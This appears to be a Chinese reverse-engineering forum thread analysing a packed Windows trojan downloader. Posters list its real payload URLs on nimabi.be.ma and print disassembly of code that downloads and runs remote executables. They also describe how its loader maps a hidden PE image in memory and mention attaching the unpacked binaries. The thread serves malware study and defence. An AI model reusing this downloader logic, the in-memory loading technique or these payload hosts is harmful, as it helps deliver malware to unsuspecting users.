能力值:
( LV9,RANK:460 )
|
-
-
6 楼
没什么东西,加了两层壳,从http://nimabi.be.ma/b/a/m.txt下载
http://nimabi.be.ma/b/a/h.exe
http://nimabi.be.ma/b/a/ie.exe
http://nimabi.be.ma/b/a/t.exe
http://nimabi.be.ma/b/a/suo.exe
http://nimabi.be.ma/b/a/suo.exe
http://nimabi.be.ma/b/a/h.exe
这么几个木马,LoadRemoteFonts机器狗也用过吧
这里是它的源代码:
http://hi.bccn.net/space-265621-do-blog-id-11625.html
dump.rar
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
脱个壳看没什么东西..都很直关.不多说了....谢谢作者给个学习的机会...
00401000 55 push ebp
00401001 8BEC mov ebp,esp
00401003 83C4 AC add esp,-54
00401006 8D45 BC lea eax,dword ptr ss:[ebp-44]
00401009 50 push eax
0040100A E8 17040000 call du_1.00401426 ; jmp to kernel32.GetStartupInfoA
0040100F 8D45 AC lea eax,dword ptr ss:[ebp-54]
00401012 50 push eax
00401013 8D45 BC lea eax,dword ptr ss:[ebp-44]
00401016 50 push eax
00401017 6A 00 push 0
00401019 6A 00 push 0
0040101B 6A 20 push 20
0040101D 6A 00 push 0
0040101F 6A 00 push 0
00401021 6A 00 push 0
00401023 FF75 08 push dword ptr ss:[ebp+8]
00401026 6A 00 push 0
00401028 E8 DB030000 call du_1.00401408 ; jmp to kernel32.CreateProcessA
0040102D 0BC0 or eax,eax
0040102F 75 10 jnz short du_1.00401041
00401031 FF75 B0 push dword ptr ss:[ebp-50]
00401034 E8 BD030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401039 FF75 AC push dword ptr ss:[ebp-54]
0040103C E8 B5030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401041 C9 leave
00401042 C2 0400 retn 4
00401045 55 push ebp
00401046 8BEC mov ebp,esp
00401048 81C4 E8FDFFFF add esp,-218
0040104E 33C0 xor eax,eax
00401050 8945 E8 mov dword ptr ss:[ebp-18],eax
00401053 6A 00 push 0
00401055 6A 00 push 0
00401057 6A 00 push 0
00401059 6A 00 push 0
0040105B 68 06304000 push du_1.00403006 ; ASCII "Shell"
00401060 E8 21040000 call du_1.00401486 ; jmp to wininet.InternetOpenA
00401065 0BC0 or eax,eax
00401067 0F84 F1000000 je du_1.0040115E
0040106D 8945 FC mov dword ptr ss:[ebp-4],eax
00401070 6A 04 push 4
00401072 FF75 10 push dword ptr ss:[ebp+10]
00401075 6A 02 push 2
00401077 FF75 FC push dword ptr ss:[ebp-4]
0040107A E8 19040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040107F 6A 04 push 4
00401081 FF75 10 push dword ptr ss:[ebp+10]
00401084 6A 06 push 6
00401086 FF75 FC push dword ptr ss:[ebp-4]
00401089 E8 0A040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040108E 6A 00 push 0
00401090 68 00000020 push 20000000
00401095 6A 00 push 0
00401097 6A 00 push 0
00401099 FF75 08 push dword ptr ss:[ebp+8]
0040109C FF75 FC push dword ptr ss:[ebp-4]
0040109F E8 E8030000 call du_1.0040148C ; jmp to wininet.InternetOpenUrlA
004010A4 0BC0 or eax,eax
004010A6 0F84 AA000000 je du_1.00401156
004010AC 8945 F8 mov dword ptr ss:[ebp-8],eax
004010AF C745 EC 00000000 mov dword ptr ss:[ebp-14],0
004010B6 C745 F0 00020000 mov dword ptr ss:[ebp-10],200
004010BD FF75 EC push dword ptr ss:[ebp-14]
004010C0 8D45 F0 lea eax,dword ptr ss:[ebp-10]
004010C3 50 push eax
004010C4 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
004010CA 50 push eax
004010CB 6A 13 push 13
004010CD FF75 F8 push dword ptr ss:[ebp-8]
004010D0 E8 9F030000 call du_1.00401474 ; jmp to wininet.HttpQueryInfoA
004010D5 0BC0 or eax,eax
004010D7 74 75 je short du_1.0040114E
004010D9 6A 00 push 0
004010DB 6A 00 push 0
004010DD 6A 04 push 4
004010DF 6A 00 push 0
004010E1 6A 00 push 0
004010E3 68 00000040 push 40000000
004010E8 FF75 0C push dword ptr ss:[ebp+C]
004010EB E8 0C030000 call du_1.004013FC ; jmp to kernel32.CreateFileA
004010F0 83F8 FF cmp eax,-1
004010F3 74 59 je short du_1.0040114E
004010F5 8945 F4 mov dword ptr ss:[ebp-C],eax
004010F8 C745 EC 00000000 mov dword ptr ss:[ebp-14],0
004010FF 8D45 EC lea eax,dword ptr ss:[ebp-14]
00401102 50 push eax
00401103 68 00020000 push 200
00401108 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
0040110E 50 push eax
0040110F FF75 F8 push dword ptr ss:[ebp-8]
00401112 E8 7B030000 call du_1.00401492 ; jmp to wininet.InternetReadFile
00401117 0BC0 or eax,eax
00401119 74 23 je short du_1.0040113E
0040111B 837D EC 00 cmp dword ptr ss:[ebp-14],0
0040111F 74 1D je short du_1.0040113E
00401121 FF45 E8 inc dword ptr ss:[ebp-18]
00401124 6A 00 push 0
00401126 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00401129 50 push eax
0040112A FF75 EC push dword ptr ss:[ebp-14]
0040112D 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
00401133 50 push eax
00401134 FF75 F4 push dword ptr ss:[ebp-C]
00401137 E8 1A030000 call du_1.00401456 ; jmp to kernel32.WriteFile
0040113C ^ EB BA jmp short du_1.004010F8
0040113E FF75 F4 push dword ptr ss:[ebp-C]
00401141 E8 FE020000 call du_1.00401444 ; jmp to kernel32.SetEndOfFile
00401146 FF75 F4 push dword ptr ss:[ebp-C]
00401149 E8 A8020000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
0040114E FF75 F8 push dword ptr ss:[ebp-8]
00401151 E8 24030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle
00401156 FF75 FC push dword ptr ss:[ebp-4]
00401159 E8 1C030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle
0040115E 8B45 E8 mov eax,dword ptr ss:[ebp-18]
00401161 C9 leave
00401162 C2 0C00 retn 0C
00401165 55 push ebp
00401166 8BEC mov ebp,esp
00401168 81C4 FCFDFFFF add esp,-204
0040116E C745 FC 3C000000 mov dword ptr ss:[ebp-4],3C
00401175 FF75 08 push dword ptr ss:[ebp+8]
00401178 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
0040117E 50 push eax
0040117F E8 D8020000 call du_1.0040145C ; jmp to kernel32.lstrcpyA
00401184 68 00010000 push 100
00401189 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040118F 50 push eax
00401190 E8 A9020000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401195 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040119B 50 push eax
0040119C 6A 00 push 0
0040119E 6A 00 push 0
004011A0 68 04304000 push du_1.00403004
004011A5 E8 82020000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
004011AA 68 88130000 push 1388
004011AF 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011B5 50 push eax
004011B6 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
004011BC 50 push eax
004011BD E8 83FEFFFF call du_1.00401045
004011C2 0BC0 or eax,eax
004011C4 74 10 je short du_1.004011D6
004011C6 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011CC 50 push eax
004011CD E8 2EFEFFFF call du_1.00401000
004011D2 EB 15 jmp short du_1.004011E9
004011D4 EB 0D jmp short du_1.004011E3
004011D6 68 E8030000 push 3E8
004011DB E8 6A020000 call du_1.0040144A ; jmp to kernel32.Sleep
004011E0 FF4D FC dec dword ptr ss:[ebp-4]
004011E3 837D FC 00 cmp dword ptr ss:[ebp-4],0
004011E7 ^ 75 C1 jnz short du_1.004011AA
004011E9 FF0D 00304000 dec dword ptr ds:[403000]
004011EF C9 leave
004011F0 C2 0400 retn 4
/////////////入口
004011F3 55 push ebp
004011F4 8BEC mov ebp,esp
004011F6 81C4 E8FEFFFF add esp,-118
004011FC 68 0C304000 push du_1.0040300C ; ASCII "user32.dll"
00401201 E8 2C020000 call du_1.00401432 ; jmp to kernel32.LoadLibraryA
00401206 0BC0 or eax,eax
00401208 74 11 je short du_1.0040121B
0040120A 68 17304000 push du_1.00403017 ; ASCII "LoadRemoteFonts"
0040120F 50 push eax
00401210 E8 0B020000 call du_1.00401420 ; jmp to kernel32.GetProcAddress
00401215 0BC0 or eax,eax
00401217 74 02 je short du_1.0040121B
00401219 FFD0 call eax
0040121B 8D45 FC lea eax,dword ptr ss:[ebp-4]
0040121E 50 push eax
0040121F 68 19000200 push 20019
00401224 6A 00 push 0
00401226 68 27304000 push du_1.00403027 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
0040122B 68 02000080 push 80000002
00401230 E8 33020000 call du_1.00401468 ; jmp to ADVAPI32.RegOpenKeyExA
00401235 0BC0 or eax,eax
00401237 75 48 jnz short du_1.00401281
00401239 C745 F8 04010000 mov dword ptr ss:[ebp-8],104
00401240 68 04010000 push 104
00401245 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040124B 50 push eax
0040124C E8 ED010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401251 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401254 50 push eax
00401255 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040125B 50 push eax
0040125C 6A 00 push 0
0040125E 6A 00 push 0
00401260 68 06304000 push du_1.00403006 ; ASCII "Shell"
00401265 FF75 FC push dword ptr ss:[ebp-4]
00401268 E8 01020000 call du_1.0040146E ; jmp to ADVAPI32.RegQueryValueExA
0040126D 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401273 50 push eax
00401274 E8 87FDFFFF call du_1.00401000
00401279 FF75 FC push dword ptr ss:[ebp-4]
0040127C E8 E1010000 call du_1.00401462 ; jmp to ADVAPI32.RegCloseKey
00401281 68 E8030000 push 3E8
00401286 E8 BF010000 call du_1.0040144A ; jmp to kernel32.Sleep
0040128B 6A 00 push 0
0040128D 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401290 50 push eax
00401291 E8 EA010000 call du_1.00401480 ; jmp to wininet.InternetGetConnectedState
00401296 0BC0 or eax,eax
00401298 75 02 jnz short du_1.0040129C
0040129A ^ EB EF jmp short du_1.0040128B
0040129C 68 04010000 push 104
004012A1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012A7 50 push eax
004012A8 E8 91010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
004012AD 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012B3 50 push eax
004012B4 6A 00 push 0
004012B6 6A 00 push 0
004012B8 68 04304000 push du_1.00403004
004012BD E8 6A010000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
004012C2 68 E8030000 push 3E8
004012C7 E8 7E010000 call du_1.0040144A ; jmp to kernel32.Sleep
004012CC 68 88130000 push 1388
004012D1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012D7 50 push eax
004012D8 68 5D304000 push du_1.0040305D ; ASCII "http://nimabi.be.ma/b/a/m.txt"
004012DD E8 63FDFFFF call du_1.00401045
004012E2 0BC0 or eax,eax
004012E4 75 02 jnz short du_1.004012E8
004012E6 ^ EB E4 jmp short du_1.004012CC
004012E8 6A 00 push 0
004012EA 6A 00 push 0
004012EC 6A 03 push 3
004012EE 6A 00 push 0
004012F0 6A 00 push 0
004012F2 68 00000080 push 80000000
004012F7 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012FD 50 push eax
004012FE E8 F9000000 call du_1.004013FC ; jmp to kernel32.CreateFileA
00401303 83F8 FF cmp eax,-1
00401306 0F84 CC000000 je du_1.004013D8
0040130C 8945 F4 mov dword ptr ss:[ebp-C],eax
0040130F 6A 00 push 0
00401311 FF75 F4 push dword ptr ss:[ebp-C]
00401314 E8 01010000 call du_1.0040141A ; jmp to kernel32.GetFileSize
00401319 83F8 0F cmp eax,0F
0040131C 0F82 9F000000 jb du_1.004013C1
00401322 6A 00 push 0
00401324 6A 00 push 0
00401326 6A 00 push 0
00401328 6A 02 push 2
0040132A 6A 00 push 0
0040132C FF75 F4 push dword ptr ss:[ebp-C]
0040132F E8 CE000000 call du_1.00401402 ; jmp to kernel32.CreateFileMappingA
00401334 0BC0 or eax,eax
00401336 0F84 92000000 je du_1.004013CE
0040133C 8945 F0 mov dword ptr ss:[ebp-10],eax
0040133F 6A 00 push 0
00401341 6A 00 push 0
00401343 6A 00 push 0
00401345 6A 04 push 4
00401347 50 push eax
00401348 E8 EB000000 call du_1.00401438 ; jmp to kernel32.MapViewOfFile
0040134D 0BC0 or eax,eax
0040134F 74 66 je short du_1.004013B7
00401351 8945 EC mov dword ptr ss:[ebp-14],eax
00401354 8BF0 mov esi,eax
00401356 8DBD E8FEFFFF lea edi,dword ptr ss:[ebp-118]
0040135C 68 04010000 push 104
00401361 57 push edi
00401362 E8 D7000000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401367 AC lods byte ptr ds:[esi]
00401368 3C 0A cmp al,0A
0040136A 75 01 jnz short du_1.0040136D
0040136C AC lods byte ptr ds:[esi]
0040136D 3C 0D cmp al,0D
0040136F 75 39 jnz short du_1.004013AA
00401371 80BD E8FEFFFF 00 cmp byte ptr ss:[ebp-118],0
00401378 74 2E je short du_1.004013A8
0040137A FF05 00304000 inc dword ptr ds:[403000]
00401380 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401383 50 push eax
00401384 6A 00 push 0
00401386 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040138C 50 push eax
0040138D 68 65114000 push du_1.00401165
00401392 6A 00 push 0
00401394 6A 00 push 0
00401396 E8 73000000 call du_1.0040140E ; jmp to kernel32.CreateThread
0040139B 50 push eax
0040139C E8 55000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013A1 6A 64 push 64
004013A3 E8 A2000000 call du_1.0040144A ; jmp to kernel32.Sleep
004013A8 ^ EB AC jmp short du_1.00401356
004013AA AA stos byte ptr es:[edi]
004013AB 0AC0 or al,al
004013AD ^ 75 B8 jnz short du_1.00401367
004013AF FF75 EC push dword ptr ss:[ebp-14]
004013B2 E8 99000000 call du_1.00401450 ; jmp to kernel32.UnmapViewOfFile
004013B7 FF75 F0 push dword ptr ss:[ebp-10]
004013BA E8 37000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013BF EB 0D jmp short du_1.004013CE
004013C1 FF75 F4 push dword ptr ss:[ebp-C]
004013C4 E8 2D000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013C9 ^ E9 FEFEFFFF jmp du_1.004012CC
004013CE FF75 F4 push dword ptr ss:[ebp-C]
004013D1 E8 20000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013D6 EB 05 jmp short du_1.004013DD
004013D8 ^ E9 EFFEFFFF jmp du_1.004012CC
004013DD EB 07 jmp short du_1.004013E6
004013DF 6A 64 push 64
004013E1 E8 64000000 call du_1.0040144A ; jmp to kernel32.Sleep
004013E6 833D 00304000 00 cmp dword ptr ds:[403000],0
004013ED ^ 75 F0 jnz short du_1.004013DF
004013EF 6A 00 push 0
004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess
004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess
004013F6 - FF25 54204000 jmp dword ptr ds:[402054] ; kernel32.CloseHandle
004013FC - FF25 4C204000 jmp dword ptr ds:[40204C] ; kernel32.CreateFileA
00401402 - FF25 48204000 jmp dword ptr ds:[402048] ; kernel32.CreateFileMappingA
00401408 - FF25 2C204000 jmp dword ptr ds:[40202C] ; kernel32.CreateProcessA
0040140E - FF25 10204000 jmp dword ptr ds:[402010] ; kernel32.CreateThread
00401414 - FF25 14204000 jmp dword ptr ds:[402014] ; kernel32.ExitProcess
0040141A - FF25 18204000 jmp dword ptr ds:[402018] ; kernel32.GetFileSize
00401420 - FF25 1C204000 jmp dword ptr ds:[40201C] ; kernel32.GetProcAddress
00401426 - FF25 20204000 jmp dword ptr ds:[402020] ; kernel32.GetStartupInfoA
0040142C - FF25 24204000 jmp dword ptr ds:[402024] ; kernel32.GetTempFileNameA
00401432 - FF25 28204000 jmp dword ptr ds:[402028] ; kernel32.LoadLibraryA
00401438 - FF25 50204000 jmp dword ptr ds:[402050] ; kernel32.MapViewOfFile
0040143E - FF25 30204000 jmp dword ptr ds:[402030] ; ntdll.RtlZeroMemory
00401444 - FF25 34204000 jmp dword ptr ds:[402034] ; kernel32.SetEndOfFile
0040144A - FF25 38204000 jmp dword ptr ds:[402038] ; kernel32.Sleep
00401450 - FF25 3C204000 jmp dword ptr ds:[40203C] ; kernel32.UnmapViewOfFile
00401456 - FF25 40204000 jmp dword ptr ds:[402040] ; kernel32.WriteFile
0040145C - FF25 44204000 jmp dword ptr ds:[402044] ; kernel32.lstrcpyA
00401462 - FF25 04204000 jmp dword ptr ds:[402004] ; ADVAPI32.RegCloseKey
00401468 - FF25 00204000 jmp dword ptr ds:[402000] ; ADVAPI32.RegOpenKeyExA
0040146E - FF25 08204000 jmp dword ptr ds:[402008] ; ADVAPI32.RegQueryValueExA
00401474 - FF25 74204000 jmp dword ptr ds:[402074] ; wininet.HttpQueryInfoA
0040147A - FF25 5C204000 jmp dword ptr ds:[40205C] ; wininet.InternetCloseHandle
00401480 - FF25 60204000 jmp dword ptr ds:[402060] ; wininet.InternetGetConnectedState
00401486 - FF25 64204000 jmp dword ptr ds:[402064] ; wininet.InternetOpenA
0040148C - FF25 68204000 jmp dword ptr ds:[402068] ; wininet.InternetOpenUrlA
00401492 - FF25 6C204000 jmp dword ptr ds:[40206C] ; wininet.InternetReadFile
00401498 - FF25 70204000 jmp dword ptr ds:[402070] ; wininet.InternetSetOptionA
|
能力值:
( LV12,RANK:300 )
|
-
-
8 楼
根本就是壳而已……
楼主给的du.exe,是一个Loader,相当于一个壳,所以输入表才会只有GetProcAddress和LoadLibraryA
之所以IDA直接看du.exe会一团糊涂,那是因为入口点那里本来就是一团冗长的花指令。
该程序只是将自己映像中包含的另一个真正的PE文件内容解密,然后申请内存内存将进映像,并跳到这个真正的PE文件中去执行。
du.exe载入内存后,其中的真正的PE文件内容从0x00511B1D处开始(00510000为du.exe的默认基址),大小为0x1200。
具体方法:
OD载入du.exe,bp VirtualAlloc,F9断下之后Ctrl+F9返回,到达如下位置,再单步几次:
00511302 59 pop ecx
00511303 85C0 test eax, eax
00511305 75 14 jnz short 0051131B
00511307 6A 40 push 40
00511309 68 00100000 push 1000
0051130E 51 push ecx
0051130F 50 push eax
00511310 FFD3 call ebx
00511312 90 nop
00511313 85C0 test eax, eax
00511315 0F84 18030000 je 00511633
0051131B 8945 F4 mov dword ptr [ebp-C], eax
0051131E 90 nop
0051131F 89C7 mov edi, eax ; 00400000
00511321 90 nop
00511322 8B75 08 mov esi, dword ptr [ebp+8] ; 00511B1D,文件开头
就可以发现00511B1D就是真正的PE文件在du.exe内存中的开始处
之后就可以看到典型的把该文件映像入0x00400000开始的内存并填充IAT表的过程。
因此到这里之后只需把00511B1D开始处的内存dump出来,就是真正的PE文件内容了。
将此文件保存为du1.exe,然后使用LordPE查看其PE结构,发现其文件大小只有0x1200字节,于是裁去在此之后的不必要部分。
用OD载入du1.exe,发现入口点处显然是一个简单的压缩壳,在如下位置:
0040429F FFE2 jmp edx
F4再F8,直接到达OEP:004011F3,用LordPE和ImportREC完成dump和修复IAT的工作。
最后得到的du2.exe,用OD和IDA打开,就非常清楚了,一切了无新意。
下载病毒URL列表文件为http://nimabi.be.ma/b/a/m.txt
所以这个玩意根本就没有所谓高质量,最后的代码也很简单一读就懂。
附件包含:
du1.exe——从du.exe内存中找到的真正PE文件。
du2.exe——du1.exe脱壳后的文件,直接用OD或IDA很容易分析。
|
能力值:
( LV15,RANK:340 )
|
-
-
10 楼
zhzhtst脱得好干净... 我觉得虚拟机里运行不起来是壳在作怪。我跟到
00511516 > 90 NOP
之后的一个 LoadLibraryA("USER32.DLL"),结果飞了 
原来PE文件在00511B1D。LoadLibraryA("USER32.DLL")那里显然修改了堆栈的返回参数,RET后接着就是LoadLibraryA(gdi32.dll)...
0012E79C 73FBE21F 返回到 USP10.73FBE21F 来自 kernel32.LoadLibraryA
0012E7A0 73FA1850 ASCII "gdi32.dll"
0012E7A4 73FA0000 USP10.73FA0000
0012E7A8 00000000
嘿嘿,谢谢小聪解答,正在想怎么脱的时候 
难道这个壳用的是另一个内存运行方法?再去看看...
|
能力值:
( LV15,RANK:340 )
|
-
-
13 楼
还是不明白这个壳怎么把内存中的EXE运行起来的
复制PE文件到00400000处,然后自己重定位,接着修改PEB的ImageBaseAddress=00400000,然后搜PEB.Ldr(就这段看得比较迷糊)...
00511322 . 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] ; ESI = pMemory_Start
00511326 . 56 PUSH ESI
00511327 . 89F1 MOV ECX,ESI
00511329 . 034E 3C ADD ECX,DWORD PTR DS:[ESI+3C] ; ECX -> 'PE'
... ...
00511331 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; 写入刚才分配的内存00400000处
... ...
00511348 . 0FB640 06 MOVZX EAX,BYTE PTR DS:[EAX+6] ; [PE+6] = (4) 读取节的个数
... ...
0051134D > 8D7D C8 LEA EDI,DWORD PTR SS:[EBP-38] ; 下面这个循环,向0040000处部署PE
00511351 . 57 PUSH EDI
00511352 . 6A 0A PUSH 0A
00511354 . 59 POP ECX
00511355 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>00511357 . 5F POP EDI
00511359 . 8B57 14 MOV EDX,DWORD PTR DS:[EDI+14] ; Size(400)
0051135D . 85D2 TEST EDX,EDX
0051135F . 74 1B JE SHORT mydu1.0051137C
00511362 . 56 PUSH ESI
00511363 . 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] ; pMemory_Start
00511367 . 01D6 ADD ESI,EDX ; 增加之前的节大小
0051136A . 8B4F 10 MOV ECX,DWORD PTR DS:[EDI+10]
0051136E . 8B57 0C MOV EDX,DWORD PTR DS:[EDI+C] ; 对齐后大小
00511372 . 8B7D F4 MOV EDI,DWORD PTR SS:[EBP-C] ; Base
00511376 . 01D7 ADD EDI,EDX ; Base + 对齐后大小
00511379 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; 向对齐后的开始位置写入数据
0051137B . 5E POP ESI
0051137C > 48 DEC EAX ; 节数-1
0051137E .^ 75 CD JNZ SHORT mydu1.0051134D
; ???
00511431 > 90 NOP ; 貌似是查找Ldr的循环
00511432 . 8B50 18 MOV EDX,DWORD PTR DS:[EAX+18] ; EDX=pMemory_Start
... ...
0051146B . 3930 CMP DWORD PTR DS:[EAX],ESI ; [EAX] == PEB.Ldr
0051146D . 74 06 JE SHORT mydu1.00511475
0051146F . 8B00 MOV EAX,DWORD PTR DS:[EAX]
00511472 .^ EB BD JMP SHORT mydu1.00511431
00511475 > 90 NOP ; 此时 [EAX]=Ldr
00511476 . 8B9D 88FEFFFF MOV EBX,DWORD PTR SS:[EBP-178] ; EBX=4000
0051147D . 85DB TEST EBX,EBX
0051147F . 0F84 9E000000 JE mydu1.00511523
00511485 . 8B75 F4 MOV ESI,DWORD PTR SS:[EBP-C] ; ESI = Base
00511488 . 01F3 ADD EBX,ESI ; 00404000 - 重定位表
0051148B > 90 NOP ; 手动重定位??
0051148C . 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]
0051148F . 85C0 TEST EAX,EAX
00511491 . 0F84 8C000000 JE mydu1.00511523
00511498 . 8B4B 10 MOV ECX,DWORD PTR DS:[EBX+10]
0051149C . 01F1 ADD ECX,ESI ; at 00404044
0051149F . 894D C4 MOV DWORD PTR SS:[EBP-3C],ECX
005114A3 . 8B0B MOV ECX,DWORD PTR DS:[EBX]
005114A6 . 85C9 TEST ECX,ECX
005114A8 . 75 04 JNZ SHORT mydu1.005114AE
005114AA . 8B4B 10 MOV ECX,DWORD PTR DS:[EBX+10]
005114AE > 01F1 ADD ECX,ESI
005114B1 . 894D C0 MOV DWORD PTR SS:[EBP-40],ECX
005114B5 . 01F0 ADD EAX,ESI ; EAX = DLL name
005114B8 . 50 PUSH EAX
005114BA . 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
005114BE . FF10 CALL DWORD PTR DS:[EAX] ; LoadLibraryA(Kernel32)
005114C1 . 85C0 TEST EAX,EAX
005114C3 . 0F84 6A010000 JE mydu1.00511633
005114CC . 89C7 MOV EDI,EAX ; EDI = Kernel32 Base
005114D0 . 8B4D C0 MOV ECX,DWORD PTR SS:[EBP-40]
005114D4 . 8B11 MOV EDX,DWORD PTR DS:[ECX]
005114D7 . 85D2 TEST EDX,EDX
005114D9 . 74 3B JE SHORT mydu1.00511516
005114DC . F7C2 00000080 TEST EDX,80000000
005114E2 . 74 0B JE SHORT mydu1.005114EF
005114E5 . 81E2 FFFFFF7F AND EDX,7FFFFFFF
005114EC . EB 0A JMP SHORT mydu1.005114F8
005114F0 . 01F2 ADD EDX,ESI
005114F4 . 42 INC EDX
005114F6 . 42 INC EDX ; EDX = API Name
005114F8 > 52 PUSH EDX
005114FA . 57 PUSH EDI
005114FC . 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
[COLOR="Red"]00511500 . FF10 CALL DWORD PTR DS:[EAX] ; Out Here!
00511503 . 8B4D C4 MOV ECX,DWORD PTR SS:[EBP-3C]
00511507 . 8901 MOV DWORD PTR DS:[ECX],EAX
00511509 . 8345 C4 04 ADD DWORD PTR SS:[EBP-3C],4
0051150E . 8345 C0 04 ADD DWORD PTR SS:[EBP-40],4
00511513 .^ EB BA JMP SHORT mydu1.005114CF
[COLOR="DarkOrchid"]00511516 > 90 NOP ; F4 Here!
00511517 . 83C3 14 ADD EBX,14
0051151B .^ E9 6BFFFFFF JMP mydu1.0051148B
要测试很简单,用附件里的du1.exe在紫色那行(00511516)按F4,然后再跟到红色的(00511500) LoadLibraryA("USER32.DLL")这里,F7进去看到:
LoadLibraryA:
7C801D77 > 8BFF MOV EDI,EDI ; kernel32.7C800000
...
7C801D98 6A 00 PUSH 0
7C801D9A 6A 00 PUSH 0
7C801D9C FF75 08 PUSH DWORD PTR SS:[EBP+8]
7C801D9F E8 ABFFFFFF CALL kernel32.LoadLibraryExA
调用前堆栈:
0012FD88 00404061 |FileName = "USER32.DLL"
0012FD8C 00000000 |hFile = NULL
0012FD90 00000000 \Flags = 0
0012FD94 00400000
0012FD98 00404014 ASCII "<@"
0012FD9C /0012FFB0
0012FDA0 |005114C0 返回到 mydu1.005114C0
0012FDA4 |00404061 ASCII "USER32.DLL"
然后就不一样了:
7C801DA4 5E POP ESI
7C801DA5 5B POP EBX
7C801DA6 5D POP EBP
7C801DA7 C2 0400 RETN 4
执行到RET时堆栈:
0012E79C 73FBE21F 返回到 USP10.73FBE21F 来自 kernel32.LoadLibraryA
0012E7A0 73FA1850 ASCII "gdi32.dll"
0012E7A4 73FA0000 USP10.73FA0000
0012E7A8 00000000
kernel32.LoadLibraryA变到 USP10.73FBE21F 这里了... 难道是我虚拟机作怪?
请知道的大大解释下这个壳是如何当程序运行起来的。
|
能力值:
( LV12,RANK:300 )
|
-
-
14 楼
看了楼上的问题后我试了一下,直接原因是LoadLibraryA的重入。
前面改了PEB里的ImageBaseAddress和相应LDR_ENTRY中的内容,后面在LoadLibraryA加载USER32.DLL的时候,会出现“du.exe不是有效的WIN32程序”的提示。
之后系统加载USER32.DLL时LoadLibraryA会出现重入,也就是LoadLibraryA加载USER32.DLL的过程中再度调用LoadLibraryA加载其他DLL。
所以在楼上在LoadLibraryA调用LoadLibraryExA的地方单步调试的时候就会出现这样的问题。
具体来说:
在LoadLibraryA中该行语句:
7C801D9F E8 ABFFFFFF CALL kernel32.LoadLibraryExA
在这里F8的时候,OD在该行的下一行语句中下了一个硬件执行断点(仅一次),然后恢复运行
然而这个LoadLibraryExA的调用出现了重入,它在加载user32.dll的时候又加载了其他一些DLL,这期间USP10.dll的DllMain函数中为了加载gdi32.dll而再次调用了LoadLibraryA,于是就在先前的硬件执行断点处断下了,所以这个时候断下的位置不是先前加载User32.dll时的那个调用帧。
流程是:
LoadLibraryA("USER32.DLL")->在调用LoadLibraryExA处按F8->LoadLibraryExA("USER32.DLL")->...USP10!DllMain->LoadLibraryA("gdi32.dll")->LoadLibraryExA("gdi32.dll")->被断下
|
能力值:
( LV12,RANK:300 )
|
-
-
15 楼
实际上你在这句:
00511500 . FF10 CALL DWORD PTR DS:[EAX]
加载USER32.DLL的时候,你直接F8(F7进入LoadLibraryA里面单步会遇到我上面说的重入问题),还是会弹出错误提示,但是会正常断下。
最后在以下地方返回:
00511636 5E pop esi
00511637 5F pop edi
00511638 5B pop ebx
00511639 C9 leave
0051163A C2 0C00 retn 0C
返回后到以下地方:
00511115 5F pop edi
00511116 5E pop esi
00511117 5D pop ebp
00511118 83C4 04 add esp, 4
0051111B 5B pop ebx
0051111C 5A pop edx
0051111D 83C4 08 add esp, 8
00511120 894C24 04 mov dword ptr [esp+4], ecx
00511124 FFE0 jmp eax ; 004040FF
进入新映像的入口点。
|
